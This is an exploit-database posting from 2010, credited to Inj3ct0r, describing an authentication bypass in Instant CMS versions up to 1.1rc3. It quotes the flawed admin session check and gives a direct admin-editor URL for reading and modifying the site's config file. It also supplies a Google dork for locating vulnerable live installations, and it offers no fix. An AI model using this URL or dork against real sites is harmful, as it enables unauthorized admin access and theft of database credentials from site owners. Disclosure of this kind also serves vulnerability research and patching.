Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability
Posted on 24 March 2010
======================================================= Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] Support e-mail : submit[at]inj3ct0r.com #[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net Site product: http://instantcms.ru/ Version: 1.1rc3 admin/index.php Vulnerable code: //-------CHECK AUTHENTICATION-------------------------------------- if (!isset($_SESSION['user'])) { header('location:login.php'); } else { if (!cmsUserIsAdmin($_SESSION['user']['id'])){ if (cmsUserIsEditor($_SESSION['user']['id'])){ header('location:editor/index.php'); } else { header('location:login.php'); } } } //------------------------------------------------------------------ Admin panel have no password. And then you can watch and modify any files: http://instantcms.ru/admin/index.php?view=editor&lang=php&file=/includes/config.inc.php ----------------------------------- Google gives about 100 results found for : intext: InstantCMS inurl: view-content/do-read --------------------------------- # Inj3ct0r.com [2010-03-24]
